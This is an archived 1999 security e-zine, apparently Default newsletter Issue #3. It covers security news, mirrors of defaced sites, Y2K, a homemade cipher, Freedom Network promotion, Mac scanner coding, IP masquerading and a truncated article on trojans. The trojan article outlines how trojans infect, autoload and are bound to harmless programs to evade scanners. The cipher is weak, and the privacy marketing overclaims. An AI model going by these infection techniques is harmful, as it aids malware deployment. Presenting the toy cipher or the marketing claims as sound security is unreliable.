home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / E-zine / Magazines / default / default3.txt < prev    next >
Encoding:
Text File  |  2002-05-27  |  57.9 KB  |  1,379 lines

  1. --------------------------------------------------------------------------------
  2.                 Default newsletter Issue #3
  3.                 http://default.net-security.org
  4.                 27.08.1999 Help Net Security
  5.                 http://www.net-security.org
  6. --------------------------------------------------------------------------------
  7.  
  8.  
  9. TABLE OF CONTENTS
  10. -----------------
  11.  
  12. I.    Editorial
  13. II.    Last weeks news on Help Net Security
  14.     a) Help Net Security news headlines
  15.     b) Defaced Pages
  16. III.    Y2K: As the millennium approaches
  17. IV.    A look into basic cryptography
  18. V.    Internet privacy: Freedom Network
  19. VI.    Macintosh Security: F33r my hybride M4c, I'm coding!
  20. VII.    Computing: A closer look at hard- and software
  21. VIII.    Linux: IP Masquerading
  22. IX.    Infection and vaccination
  23. X.    Freedom of speech - related incidents
  24. XI.   Scams - Getting something by all means 
  25. XII.    Intrusion and detection part two
  26.  
  27.  
  28.  
  29. I. Editorial
  30. ------------
  31.  
  32. Hey people. We received good comments on Default newsletter from both individuals and 
  33. security professionals. We have only 2 issues behind, but we will be even better (of
  34. course with your feedback and help). If you would like to write an article for Default
  35. newsletter please do e-mail us. Any help is appreciated. 
  36. As you can see, this issue is little bit shorter. That is because Doug Muth didn't 
  37. came yet from his holidays and Thejian and me were so busy this week. So do expect next
  38. Default newsletter to be bigger and better than the previous ones.
  39. In case you want to mirror Default newsletter on your site e-mail us also;)
  40.  
  41. Subscribing to Default newsletter:
  42. send an e-mail to majordomo@net-security.org with a body message subscribe news your@email
  43.  
  44.  
  45. Berislav Kucan
  46. aka BHZ, webmaster Help Net Security
  47. bhz@net-security.org
  48.  
  49. Xander Teunissen
  50. aka Thejian, co-webmaster Help Net Security
  51. thejian@net-security.org
  52.  
  53.  
  54.  
  55. II. Last weeks news on Help Net Security
  56. ----------------------------------------
  57.  
  58. a) Help Net Security news headlines
  59.  
  60. - Friday 20th August 1999:
  61.  
  62.     Default #2 released
  63.     ABC compromised
  64.     Belgian bank compromised
  65.     Intel extends on-line privacy ban
  66.     Homophobic web site "stolen" by hackers?
  67.     Indonesia responds to cyber war threats
  68.     Watching workers
  69.     Carding in Newcastle
  70.     
  71. - Saturday 21st August 1999:
  72.  
  73.     Linux trojan in portmap.c
  74.     FTP.exe overflow
  75.     Biometrics in prisons
  76.     Office 2000 also vulnerable to Jet flaw
  77.     Former CIA director kept state secrets on home PC
  78.     Furor rising over PV wiretap plan
  79.     Student draws first net piracy conviction
  80.  
  81. - Sunday 22nd August 1999:
  82.  
  83.     MS security bulletin #30
  84.     Sun says US army is testing Jini
  85.     Hardencrypt
  86.     E-commerce group formed to combat fraud
  87.     ReDaTtAcK busted
  88.  
  89. - Monday 23th August 1999:
  90.  
  91.     Firm nabs cracker with intrusion detection tool
  92.     First Net convict will do no time
  93.     GAO risk-assessment report
  94.     Sprint plans service to detect viruses
  95.     US Government and inavasion of privacy
  96.     East Timorese domain host denounces cyberwar
  97.     Secure your web site
  98.     DOD speaks on Y2K
  99.     Bomb for Microsoft manager
  100.  
  101. - Tuesday 24th August 1999:
  102.  
  103.     ISS X-force advisory on Lotus Domino server 4.6
  104.     Technology keys to tracking down Internet crime
  105.     Govt. home-invasion bill
  106.     Hackers scanning for trouble
  107.     Norton AntiVirus 2000 is out
  108.     Secret searches from DOJ
  109.     SSL CPU consumption causes concerns
  110.     Unix: It doesn't need to be so insecure
  111.  
  112. - Wednesday 25th August 1999:
  113.  
  114.     Shoutcast compromised
  115.     HK police to establish computer crime team
  116.     Smith admitted to creating Melissa
  117.     New IE5 bug worst then ever?
  118.     Audit office blasts agencies' serious security flaws
  119.     Malicious attack on linux-kernel mailinglist
  120.     More cyber-war threats
  121.  
  122. - Thursday 26th August 1999:
  123.  
  124.     Taiwan circles wagons in cyber-warfare
  125.     UK webhosting company hit by virus
  126.     Netscape issues web-server fix
  127.     Windows and bugs? Nooooo?
  128.     CWI cracks 512 bit key
  129.     Mounting an anti-virus defense
  130.     Tracing stolen computers through RC5
  131.     Self destructing e-mails? Nice
  132.     Y2K problems in Pakistan
  133.     Retrospective on cracking contest
  134.     Y2K test
  135.  
  136. http://net-security.org - Daily security related news
  137. http://net-security.org/news - News archives
  138. http://net-security.org/headlines.shtml - Add HNS headlines to your web-site
  139.  
  140. b) Defaced pages: (mirrors provided by Attrition (http://www.attrition.org))
  141.  
  142. Site: Red Hat Indonesia (www.redhat.or.id)
  143. Mirror: http://default.net-security.org/3/www.redhat.or.id.htm
  144.  
  145. Site: Official Web site of Limp Bizkit (www.limpbizkit.com)
  146. Mirror: http://default.net-security.org/3/www.limpbizkit.com.htm
  147.  
  148. Site: Monica Lewinsky's site (www.monicalewinsky.com)
  149. Mirror: http://default.net-security.org/3/www.monicalewinsky.com.htm
  150.  
  151. Site: Madison Square Garden (www.thegarden.com)
  152. Mirror: http://default.net-security.org/3/www.thegarden.com.htm
  153.  
  154. Site: The State University of West Georgia (www.westga.edu)
  155. Mirror: http://default.net-security.org/3/www.westga.edu.htm
  156.  
  157. Site: Rock.com's Rolling Stone's Web site (www.stones.com)
  158. Mirror: http://default.net-security.org/3/www.stones.com.htm
  159.  
  160.  
  161. III. Y2K: As the millennium approaches
  162. -------------------------------------
  163.  
  164. These weeks' Y2K headlines:
  165.  
  166. The computer network used by many Vermont police agencies and other 
  167. emergency services went down for two days this week while technicians 
  168. were preparing the system for the year 2000. While it was down, 
  169. prosecutors had problems getting police paperwork, reporters couldn't 
  170. get routine releases, and motorists needing copies of accident reports 
  171. were out of luck. Officials do not yet know why the computer crashed. 
  172. They do know it happened as technicians were upgrading the system to 
  173. prepare for Y2K. It took more than two days to get the system running 
  174. again. In the meantime, much of the record-keeping had to be done the 
  175. old-fashioned way: with pen and paper. 
  176.  
  177. PC Week reported about MS Excel Y2K problems: 
  178. "Unless users of Microsoft Corp.'s Excel download scanning tools from 
  179. the company's Web site, their spreadsheets could go haywire when they 
  180. open their files on Jan. 1. 
  181. A Boston-based technology management consulting company has found that 
  182. an Excel year 2000 error causing drastic math errors went undetected 
  183. by a handful of Y2K analysis tools. 
  184. The core of the problem is that Excel versions through Excel 2000 have 
  185. a DATE() function that treats all two-digit years as 20th-century dates, 
  186. regardless of how Excel is configured to handle two-digit dates. As 
  187. a result, spreadsheets that use the DATE function are particularly 
  188. vulnerable to Y2K problems. (By default, Excel 97's and Excel 2000's 
  189. other date functions, as well as the software's data entry routines, 
  190. treat two-digit dates less than 30 as part of the 21st century)"
  191.  
  192. The Millennium Bug that promised to swell U.S. courts with lawsuits 
  193. arising from damage that may occur if a computer system fails to 
  194. recognize the Year 2000 so far has resulted in only 74 cases filed, 
  195. according to a report released Monday by PricewaterhouseCoopers.
  196. The trickle has the potential to turn into a full fledge flood after 
  197. the clock strikes midnight 1999, some experts said.
  198. As of June 30, there were only 74 cases filed in state and federal 
  199. courts against 45 defendants that related to the Year 2000 computer 
  200. glitch (Y2K), according to the report.
  201.  
  202. Karen Shaw completed her 39-day trek across the state in which she 
  203. set out to promote Y2K awareness to rural residents of Oregon. 49 year 
  204. old teacher started her journey to show others that Y2K is coming very 
  205. soon, and they must be prepared. Shaw left Medford with only $20 but 
  206. said she lived on the generous donations of food and cash from people 
  207. she encountered along the way. She said: "I did not come across any 
  208. panicked people, but very practical, grounded, spiritual, caring people
  209. who are just doing what their hearts tell them to do".
  210.  
  211. Hundreds of people in Japan complained Sunday after their automobile 
  212. navigation systems went haywire - the result of a Y2K-like glitch in 
  213. the satellite system used in navigation devices worldwide. Screens went
  214. blank and bizarre symbols turned up on the electronic navigators, 
  215. essential for millions of drivers in a country where urban streets are 
  216. a chaotic jumble. Pioneer Corp, a major manufacturer of car navigation 
  217. systems, received about 600 calls on its help hotline, said company 
  218. spokesman Hidehiko Shimizu. Shimizu said callers were directed to the 
  219. nearest repair shop, where their systems were fixed for free.
  220.  
  221. Y2K TOOLS
  222. ---------
  223.  
  224. TITLE: Outlook Express Year 2000 Update  
  225. SIZE: 140 Kb
  226. TYPE: Freeware
  227. REQUIREMENTS: Windows 95/98/NT, Outlook Express 4.01
  228. DOWNLOAD: http://default.net-security.org/3/en-x86-Q234681.exe
  229.  
  230. INFO: Part of Windows 98 Service Pack 1, this program will resolve a 
  231. year 2000 issue with Outlook Express 4.01. The year 2000 issue occurs 
  232. when receiving an IMAP mail message or a News message with a two-digit
  233. year as the sent date. The date can be misinterpreted under certain 
  234. conditions. For example, if the two-digit year is anything other than 
  235. '99, Outlook Express assumes the century value is the same as the 
  236. current century. If the current year is 2000, and a two-digit date is 
  237. received as '97, then the year will be interpreted as 2097. However, 
  238. there is one special case when different logic is applied. If a 
  239. two-digit year of '99 is received and the current year is a multiple 
  240. of 100 (e.g., 2000), the year will be interpreted as the current year 
  241. plus 98 (e.g., 2098).
  242.  
  243.  
  244.  
  245. Berislav Kucan
  246. aka BHZ
  247. bhz@net-security.org
  248. http://net-security.org
  249.  
  250.  
  251.  
  252. IV. A look into basic cryptography
  253. ----------------------------------
  254.  
  255.   
  256. This is where I left off when I was working on the HOWTO last.... so 
  257. from here on in is new and (slightly) improved.
  258. I probably have my terminology wrong, but the next is what I think is 
  259. called an output feedback cipher.
  260. It takes the output from one step of applying the cipher, and uses 
  261. that to apply the cipher to the next part.
  262. This is the most simple method of an output feedback that I could think
  263. of.
  264. First index the alphabet in some manner, it could be using ascii values, 
  265. or it could be a simple 1-26 method (I suggest ascii because then you 
  266. will allow for punctuation, I used a simple 1-26 because it is easier 
  267. to explain the cryptosystem).
  268.  
  269. A=1 B=2 C=3 D=4 E=5 F=6 G=7 H=8 I=9 J=10 K=11 L=12 M=13 N=14 
  270.  
  271. O=15 P=16 Q=17 R=18 S=19 T=20 U=21 V=22 W=23 X=24 Y=25 Z=26 
  272.  
  273. This is a very basic transposition cipher as is, but will soon change.
  274.  
  275. The algorithm in mathematical terms is:
  276.  
  277. (N+P(1))%26=C(1)
  278.  
  279. (N+C(1)+P(2))%26=C(2)
  280.  
  281. (N+C(2)+P(3))%26=C(3)
  282.  
  283. (N+C(3)+P(4))%26=C(4)
  284.  
  285. ...
  286.  
  287. (N+C(r-1)+P(r)=C(r)
  288.  
  289. This may seem complicated, but its not.
  290.  
  291. N is a random number that will be passed on as a key. I suggest a 
  292. larger number to protect yourself from a brute force attack. Do not 
  293. use a number divisible by 26. In fact, for safety's sake, try using a 
  294. larger prime, or a product of two smaller primes.
  295.  
  296. C(1) is the first ciphertext letter
  297.  
  298. P(1) is the first plaintext letter
  299.  
  300. r is the total number of characters in the message.
  301.  
  302.  
  303.  
  304. % is the mathematical symbol for the function modulus.
  305.  
  306. Modulus is like the remainder after dividing an integer by another integer.
  307.  
  308. So 28%26=2
  309.  
  310. and 942%26=6
  311.  
  312. (if your calculator doesn't handle modulus, a simple way to do it would be...
  313.  
  314. 942/26=36.2307692307692307692307692307692
  315.  
  316. 36.2307692307692307692307692307692-36=.2307692307692307692307692307692
  317.  
  318. .2307692307692307692307692307692*26=6
  319.  
  320. (round, your calculator cant handle these decimals -windows calc in 
  321. scientific mode can handle modulus, the key you are looking for is Mod)
  322.  
  323. You take your message. Lets take the word hello for simplicities sake.
  324.  
  325. HELLO
  326.  
  327. first change it to corresponding numbers.
  328.  
  329. 8 5 12 12 15
  330.  
  331. our key number will be... 73. (once again, I suggest a more secure key 
  332. number than this, but this will serve our purposes well.)
  333.  
  334. 1 2 3 4 5
  335.  
  336. 8 5 12 12 15
  337.  
  338. Restate the Algorithm...
  339.  
  340. (N+P(1))%26=C(1)
  341.  
  342. (N+C(1)+P(2))%26=C(2)
  343.  
  344. (N+C(2)+P(3))%26=C(3)
  345.  
  346. (N+C(3)+P(4))%26=C(4)
  347.  
  348. ...
  349.  
  350. (N+C(r-1)+P(r)=C(r)
  351.  
  352. And begin applying the algorithm:
  353.  
  354. H (73+8)%26=3 
  355.  
  356. E (73+3+5)%26=3
  357.  
  358. NOW you see the power of a more complicated cipher. Here 3 stands for 
  359. both H AND E
  360.  
  361. L (73+3+12)%26=10
  362.  
  363. L (73+10+12)%26=17
  364.  
  365. Once again, the power of a more complicated cipher. while 3 stands for 
  366. both H and E, L is represented by both 10 and 17.
  367.  
  368. O (73+17+15)%26=1
  369.  
  370. 3 3 10 17 1
  371.  
  372. Then take these numbers, and transfer them back to letters.
  373.  
  374. A=1 B=2 C=3 D=4 E=5 F=6 G=7 H=8 I=9 J=10 K=11 L=12 M=13 N=14 
  375.  
  376. O=15 P=16 Q=17 R=18 S=19 T=20 U=21 V=22 W=23 X=24 Y=25 Z=26 
  377.  
  378. CCJQA
  379.  
  380. Now you ask how do you get back to the original "HELLO"?
  381.  
  382. Well first you need to find a way to tell someone the key number.... I 
  383. suggest appending it to the beginning of the message, go back to how it
  384. was in numbers. (Note, if someone knows the method you used to hide the
  385. key number in the message, the security of the message is lost. This is
  386. the case with all single key cryptosystems.)
  387.  
  388. 3 3 10 17 1
  389.  
  390. here the code number was 73. that's 2 letters.
  391.  
  392. add 2 7 3 to your message in the beginning
  393.  
  394. 2 7 3 3 3 10 17 1
  395.  
  396. then make it the text
  397.  
  398. B G C C C J Q A send that to someone. They extract the numbers, and then
  399. the key 
  400.  
  401. number of 73.
  402.  
  403.  
  404.  
  405. Here's an idea, I will make this section somewhat interactive. 
  406.  
  407. If you can decrypt this message back to the original text of HELLO, 
  408. please send your analysis of how to decrypt it using mathematical terms
  409. to crypto@net-security.org. 
  410.  
  411. Ill go over all the emails and post who was first, and then go over it 
  412. in the next issue.
  413.  
  414. Have fun.
  415.  
  416. -Iconoclast
  417.  
  418.  
  419.  
  420. V. Internet privacy: Freedom network
  421. -----------------------------------------
  422.  
  423. The Freedom Network plays an integral role in Zero-Knowledge's
  424. absolute privacy solution - Freedom.
  425.  
  426. Here's a quick look at what exactly the Freedom Network is 
  427. and what it does.
  428.  
  429. You'll often hear Freedom referred to as client/server
  430. software, but what does this really mean? Well, the 
  431. "client" part is the software you install on your personal
  432. computer and the "server" part is the software that runs 
  433. the Freedom Network. 
  434.  
  435. The Freedom Network is a series of servers distributed 
  436. among ISPs and organizations around the world. 
  437.  
  438. Internet traffic normally travels from source to 
  439. destination unsecured (i.e. not encrypted) while passing 
  440. through certain servers which can be easily identified. 
  441.  
  442. This is like sending confidential information using a 
  443. postcard - anyone who handles the postcard knows the 
  444. sender, the recipient and the contents. This unsecured 
  445. delivery system makes message interception, falsification 
  446. and tracking possible. 
  447.  
  448. To solve this problem, Freedom encrypts all Internet 
  449. traffic and routes it through a series of anonymous Freedom 
  450. servers, known as the Freedom Network.
  451.  
  452. Each server in the chain knows only the previous and 
  453. following servers in the path, and nothing about the traffic 
  454. (data) that it's handling. This makes the system extremely 
  455. secure since no single server knows both the origin and the
  456. destination of the traffic.
  457.  
  458. In fact, no one, not even your ISP, can monitor your web 
  459. activities. 
  460.  
  461. Does My ISP Need A Freedom Server For Me To Use Freedom?
  462.  
  463. It's important to note that your ISP doesn't need to run a 
  464. Freedom Server for you to enjoy the benefits of Freedom. If
  465. they do opt to host one, however, you may notice an increase
  466. in browsing speed while running Freedom. This will be 
  467. explained in greater detail in the next section.
  468.  
  469. - Network Speed
  470.  
  471. We often talk about what effect running Freedom will have 
  472. on your Internet connection speeds. These are also known as
  473. "latency" issues. 
  474.  
  475. Freedom employs a number of systems to foil any attempts at
  476. analyzing Freedom user's Internet activities. The net 
  477. effect of these systems can result in slightly slower
  478. connection speeds for some users. The exact latency, if 
  479. any, that a user will experience while running Freedom 
  480. depends on many factors, including;
  481.  
  482. - proximity to a Freedom Server
  483. - geographic location relative to the Internet backbone
  484. - the speed of your connection
  485. - random Internet bottlenecks or "traffic jams"
  486.  
  487. When a user running Freedom connects to the Internet 
  488. through their ISP, that connection will use a greater 
  489. amount of bandwidth than a non-Freedom connection. As 
  490. mentioned above, this is due to the extra systems Freedom 
  491. employs to ensure user privacy. 
  492.  
  493. This extra bandwidth consumption will be more taxing on an
  494. ISP's servers as the Freedom user's traffic passes though 
  495. their system on its way to the first Freedom Server on the 
  496. Freedom Network.
  497.  
  498. If, however, the user's ISP is hosting a Freedom Server, 
  499. that server will be able to intercept this traffic much 
  500. earlier, thereby streamlining the entire process. This, in
  501. turn, will result in quicker connection speeds for the 
  502. Freedom user.
  503.  
  504. To sum up, the closer a Freedom user's computer is to the 
  505. first Freedom Server, the less latency a Freedom user will
  506. experience. Since the closest a user can possibly get to a 
  507. Freedom Server is if their ISP is running one - alerting
  508. your ISP to the benefits of running a Freedom Server is a 
  509. good idea! :-)
  510.  
  511. For an up to date listing of worldwide Freedom Server 
  512. operators, please visit:
  513. http://www.zeroknowledge.com/partners/founders.asp
  514.  
  515. Please keep in mind that this list gets bigger every day
  516. as more server operators sign up so be sure to check back
  517. often.
  518.  
  519. - Security Issues
  520.  
  521. "How is it possible that my ISP can't monitor my activities 
  522. since all my communications pass through their servers?"
  523.  
  524. Simple - all the data leaving your machine is encrypted 
  525. using strong crypto, which means that no one, not even 
  526. your ISP, can watch what you're doing. 
  527.  
  528. In fact, whether you're sending email, surfing the Net, 
  529. chatting or posting to newsgroups, Freedom ensures that
  530. your activities remain private!
  531.  
  532. Why should I trust your security when other supposedly 
  533. invulnerable codes and systems have been cracked?
  534.  
  535. - Software
  536.  
  537. Zero-Knowledge uses established public algorithms that have 
  538. proven to be impervious to attack. Well-known public algorithms 
  539. like Diffie/Helman, Triple DES, Blowfish and others ensure that 
  540. the system will remain secure. ZK is uncompromising in its 
  541. testing and implementation of encryption technology, using only 
  542. established algorithms with unbreakable bit lengths - we do NOT 
  543. cut corners.
  544.  
  545. - The More Bits, The Stronger The Encryption 
  546.  
  547. As a Canadian company, ZK can export encryption technology far 
  548. stronger than the US Government's 56-bit encryption export standard. 
  549. A document encrypted with 56-bit key length would have 
  550. 72,057,594,037,927,900 possible keys. Freedom's encryption begins 
  551. at 128-bit key length, meaning it has 
  552. 340,282,366,920,938,000,000,000,000,000,000,000,000 possible keys. 
  553. A supercomputer capable of trying one million keys per second in 
  554. a brute-force attack would require 10,000,000,000,000,000,000,000,000 
  555. years to find the right key. That's a long time.
  556.  
  557. - Personnel
  558.  
  559. A number of experts in the field of privacy and cryptography have 
  560. estimated that there are perhaps five people in the world capable of 
  561. designing and lending credibility to a system of this complexity. ZK 
  562. Chief Scientist Ian Goldberg appears on that short list.
  563.  
  564. ZK sought out Mr. Goldberg because of his reputation for cracking 
  565. other supposedly secure systems. As a grad student at USC Berkeley's 
  566. Internet Security Applications Authentication and Cryptography Group, 
  567. Ian cracked the 40-bit DES code in the RSA Data Security Challenge in 
  568. just three and a half hours. He also earned international recognition 
  569. for his part in breaking the Netscape SSL encryption system, as well 
  570. as the cryptography system used in the GSM cellular phone standard.
  571.  
  572. - Peer Review 
  573.  
  574. Freedom has always been and will continue to be opened up for independent 
  575. review by acknowledged industry experts.
  576.  
  577. -- Bruce Schneier of Counterpane Systems will audit the source code 
  578. line-by-line to ensure that no cracks, holes or errors exist in the 
  579. encryption implementation. Mr. Schneier, another short-list member, 
  580. is well-known as a veteran cryptographer and author of Applied Cryptography:
  581.  
  582. Protocols, Algorithms, and Source Code, widely recognized as the bible of 
  583. cryptography. 
  584.  
  585. Complete Privacy
  586.  
  587. ZK puts its customers' privacy first - with no exceptions. Unlike 
  588. key-escrow or third-party systems, Zero-Knowledge (as implied by its name) 
  589. is unable to determine who is behind a given pseudonym -- even under threat 
  590. of force. 
  591.  
  592.  
  593. Jordan Socran
  594. Zero Knowledge Systems 
  595. (http://www.zeroknowledge.com)
  596.  
  597.  
  598.  
  599. VI. Macintosh security: F33r my hybride M4c, I'm coding!
  600. -------------------------------------------------------------
  601.  
  602. Most underground mac users are facing the same problems: only very few
  603. people are actually coding  network security tools on Mac. The main 
  604. reason is that coding a tcp/ip stack would take hundred of lines just 
  605. to initialize. Today many products are offering a easy approach to 
  606. programming, developing a project in RealBasic (http://www.realsoftware.com)
  607. is much more easier than in CodeWarrior (http://www.metrowerks.com) 
  608. even if each have sepecificities and use different language. 
  609. Security software are ,usualy, not very big since they're focused on one type of
  610. vulnerability.
  611. It takes a long time to code, to debug a program.Another way to create 
  612. your own tools is to use other languages, faster to code and to use.
  613. Many cross platform languages exist.Most useful are C/C++, Visual Basic,
  614. perl, ph3, java, rebol and much more. Rebol is a new great language 100% 
  615. network oriented (http://www.rebol.com), it easy to code. You can do 
  616. many things from basic mail client to databases, table builder, port 
  617. scan. In few minutes you can build for example a scanner for a remote 
  618. vulnerability on ip ranges. I made few month a cgi-check like in rebol, 
  619. it scans around 70 famous vulnerabilities it took few minutes to 
  620. adapt it from a C source. Plus the code is used by a virtual machine 
  621. (available for 17 OS), and it quiet fast. Don't expect an well designed 
  622. software with full of color because it's commande line only. 
  623. Another language is perl. Many sources are available in the security 
  624. domain, you can easily use those with Macperl and or with a local 
  625. webserver. Make sure those sources are likely to be used on your os to 
  626. even think about using a firewall admin tool in perl.... Anyway if you 
  627. plan to use other languages that can't run on MacOs you can use a 
  628. emulation, or install Linuxppc.
  629. The macintosh with tools like "realbasic" allow you to build 
  630. software in an almost ligne free of code way.Everything is performed 
  631. graphically, except all commands.
  632. The compiler allows to build software for macOs and for wintel.
  633. For java it's more difficult to code even if tools jdk are 
  634. available for mac.
  635. It'll ask you alot of patience.If you just start programming, and want 
  636. to learn fast you'd better start with RealBasic.Many people from the mac
  637. underground scene code with realbasic, for example Portsniffer
  638. (http://software.theresistance.net) is a great product.It's one of the
  639. fastest port scanner I've ever seen on Mac. Another alternative is MacOX, 
  640. a unix like made by Apple.Many unix tools are available or usable on 
  641. this OS.It's a Unix easier to configure since MAcos computer have less 
  642. type of hardware. Before you choose any languages you'd better learn how
  643. to code, sometimes it takes years to  claim to know a language.Don't 
  644. for get that only the limit you have is your imagination!
  645.  
  646. deepquest 
  647. deepquest@default.net-security.org
  648.  
  649. All rights not reserved- Serving since 1994
  650. http://www.deepquest.pf
  651.  
  652.  
  653.  
  654. VII. Computing: A closer look at hard- and software
  655. ----------------------------------------------------
  656.  
  657. Intel Celeron CPU has been introduced at the end of June 1998 with the version at 
  658. 266 MHz of clock, aiming at balancing the success of AMD K6-2 processor released a 
  659. month before. It used the Deshutes Core at 0.25 microns of Pentium II CPUs but it 
  660. didn't have L2 cache; this technical solution allowed to obtain high performance 
  661. with floating point calculation due to the floating point processing unit (FPU) 
  662. identical to that used with Pentium II CPUs, but it is a big gap with integer 
  663. calculations, both in comparison to K6-2 and Pentium II, due to the lack of L2 cache. 
  664. In July 1998 the version at 300 MHz of clock has been released always without L2 cache, 
  665. while at the beginning of September the versions 300A and 333 MHz have been launched, 
  666. with L2 cache at 128 Kbytes working at the clock frequency (against 512 Kbytes at half 
  667. clock frequency of Pentium II CPUs) and put within the Core of the processor (on die). 
  668. The introduction of the L2 cache allowed to reduce the gap with performance with integer 
  669. calculations of the previous versions of Celeron CPUs making this processor a perfect 
  670. solution in every field. The technical features of Celeron CPU up to September 1998 can 
  671. be summarized as following:
  672.  
  673. ╖ Deshutes core at 0.25 microns (as for Pentium II CPUs), which is called Mendocino for 
  674.   CPUs including L2 cache and Covignon for those without L2 cache; 
  675. ╖ L1 cache at 32 Kbytes divided in two parts each with 16 Kbytes respectively for 
  676.   instructions and data (as for Pentium II); 
  677. ╖ L2 cache at 128 Kbytes working at the clock frequency and put on die (in Pentium II it 
  678.   amounts at 512 Kbytes working at half clock frequency and put on the processor cartridge, 
  679.   outside the cpu's Core); 
  680. ╖ Frequency multiplier locked both upwards and downwards; 
  681. ╖ Bus frequency at 66 MHz against 100 MHz of Pentium II CPU; 
  682. ╖ SEPP package, that is based on cartridge and use of Slot 1 motherboard (the same used 
  683.   by Pentium II CPUs). 
  684.  
  685.  
  686. Intel marketing has always maintained a low cost for Celeron processors, on one side to 
  687. compete with AMD K6-2 on low-end market, on the other to avoid to add an expensive product 
  688. to Pentium II. Let's note two aspects:
  689.  
  690. ╖ Celeron uses a bus frequency of 66 MHz while that of Pentium II is 100 MHz; if in practice 
  691.   the differences in performance between the two solutions, with the same clock frequency, 
  692.   are reduced, to the user the first seems to be cheaper, while the second seems to be more 
  693.   "professional" so many buy systems based on Pentium II with more profits for Intel. 
  694. ╖ The performance of Celeron Mendocino and Pentium II, with the same clock frequency, are 
  695.   almost aligned; Pentium II has a big advantage if used with server, where the presence of 
  696.   L2 cache 4 times bigger, even if working at half clock frequency, is evident. For this 
  697.   reason, Intel has always maintained an high clock difference between the to CPUs, so to 
  698.   avoid that power users buy Celeron with higher frequency, less profitable than Pentium II. 
  699.  
  700.  
  701. At the beginning of 1999 a new version of Celeron Mendocino CPU has been released; if the 
  702. technical features are the same, the package of the CPU, that is SEPP one, has been 
  703. substituted by a PPGA one:
  704.  
  705. SEPP Package: it is installed on Slot 1 and it is similar to a Pentium II CPU without 
  706. external plastic cover; note in the middle, the CPU core and the space on its sides where 
  707. there are the chips of the L2 cache with Pentium II CPUs.
  708.  
  709. PPGA Package: very similar to a Pentium MMX CPU it is more compact in comparison the SEPP 
  710. version and it is installed on Socket 370.
  711.  
  712.  
  713. Officially the reasons which led to the introduction of PPGA package aimed at reducing 
  714. the production costs of the processor, as the SEPP package, an heritage from Pentium II, 
  715. wasn't worth to exist anymore as the L2 cache is anymore put on it but directly within 
  716. the CPU Core.
  717. Another reason, linked to marketing, is that of making the processor market more selective: 
  718. Slot 1 for more "professional" systems based on Pentium II and Pentium III processors, 
  719. Socket 370 for those cheaper based on Celeron CPU. Up to the version at 433 MHz both 
  720. variants of Celeron, SEPP and PPGA, were available, while from the version at 466 MHz on 
  721. SEPP was almost completely abandoned.
  722. Celeron CPU was very successful due to its general performance in every field and to its 
  723. high overclockability which characterized almost every version; with these processors it 
  724. was possible to achieve high clock frequencies, higher than those of Pentium II processors, 
  725. with a very reduced investment. This article aims at checking the overclockability of 
  726. Celeron CPU and finding, where possible, which is the best version of Celeron CPU in 
  727. comparison to the price and the performance.
  728.  
  729. Damir Kvajo
  730. aka Atlienz
  731. atlienz@default.net-security.org
  732.  
  733.  
  734.  
  735. VIII. IP Masquerading: Multi-computer access to a network via single interface on the server
  736. -----------------------------------------------------------------------
  737.  
  738. IPmasq basis:
  739. When you set up IP Masquerading system on your Linux servers,
  740. other machines on the *local* network will be able to use
  741. the single network interface on the server. The most common usage
  742. is to provide internet access to other machines, which do not
  743. have their own connection.
  744.  
  745.  
  746. The difference between Linux IPmasq and Windows tools (i.e. Wingate)
  747. The is a big difference between the two. IPmasq is the "IP forwarding 
  748. system", while Wingate acts as a proxy. So, to make the machine 
  749. use the wingate, each application has to be configured separately,
  750. while to use IPmasq, one just have to set up a "default gateway" 
  751. for the machine. Further adjustments of client permissions are set
  752. on the server side (by modifying the firewall rules). Also, 
  753. IPmasq is capable of forwarding any kinds of protocols, even those
  754. which does not have a special IPmasq helper application.
  755.  
  756.  
  757. Kernel options.. To enable IP masquerade in the kernel, select:
  758. - ip firewalling- packet filter firewall on a Linux box
  759. - ip always defragment- neccessary for ipmasq to work. The packet is 
  760. defragmented (put into one piece from the network fragments) on the server
  761. and then goes "to the court".
  762. - ip masquerading- actual ip masq support
  763. - transparent proxy support- by selecting this option, client machines think
  764. they communicate with the end server, while infact it is a local proxy.
  765. - ICMP masquerading- adds IPmasq ICMP support (without this, the system 
  766. does it only for UDP, TCP (and ICMP errors).
  767. - ipmasq special modules support
  768. - ipautofw masq support
  769. - ipportfw masq support
  770. (optional)
  771. - optimize as router
  772.  
  773.  
  774. Tools to get:
  775. - ipmasq (the automatic ipmasq script, very useful, just be sure to 
  776.     get the new one with the ipchains support in it)
  777. - ipchains
  778. - ipautofw
  779. - ipportfw 
  780. - ipmasqadm (special modules support)
  781.  
  782.  
  783. Once you are finished with the kernel configuration, compile it and
  784. install the new kernel. Add:
  785. echo "1" > /proc/sys/net/ipv4/ip_forward
  786. to some of your system initialization scripts (or do it manually).
  787.  
  788.  
  789. After you raise the interface you want others to use (usually ppp0),
  790. just run "ipmasq" to recompute firewall rules. By default, IPmasq
  791. allows only the local network to use the interface.
  792.  
  793.  
  794. Client side adjustments:
  795. Linux:
  796. as root, execute:
  797. route del default; route add default gw your.servers.ip.address
  798. You can see the current routing table by issuing "route", active
  799. connections with "netstat", interfaces with "ifconfig"
  800.  
  801. Windows:
  802. as any user (9x) click Start->Settings->Control panel->Network->
  803. TCP/IP-network device and in the Gateway tab, add your server's IP
  804. to the list.
  805. dev
  806. dev@net-security.org
  807.  
  808.  
  809.  
  810. IX. Infection and vaccination
  811. ----------------------------
  812.  
  813. Since school is back in for a lot of people, the number of trojans 
  814. being made/updated has decreased(same with the length of this article).
  815. So, this is the first of a few articles that simply explain general 
  816. info about trojans, to help remove them. We also have info on the new 
  817. LockDown 2000.  
  818.  
  819. As most people know a trojan is a program that says it will do something 
  820. and then does something else. Currently the only security hole trojans
  821. take advantage of is someone willing to run a program. Here is the 
  822. general way most trojan infect people:
  823. 1. Someone is tricked into running the trojan
  824. 2. Then it copies to another location
  825. 3. After that it starts listening for connections
  826. 4. Writes to the registry so it will load with Windows
  827.  
  828. Windows lets programs autoload when booting many different ways. Just 
  829. about everyone knows about the startup folder on the start menu. Most 
  830. trojans don't use this method, though we have seen at least one that 
  831. did. Another autoloading method is via the registry. This is the most 
  832. common way a trojan uses to start with windows. While lesser known is 
  833. the win.ini and even system.ini. 
  834.  
  835. A common thing to do among trojan users is to "bind" the trojan they 
  836. want to infect someone with. Binding allows them to make a harmless 
  837. program into a dangerous one. Popular trojans such as DeepThroat and 
  838. SubSeven come with such tools. While many separate tools exist and are 
  839. easily found that do the same(such as silkrope). Binding also makes it 
  840. more difficult to be picked up by virus/trojan scanners, but it still 
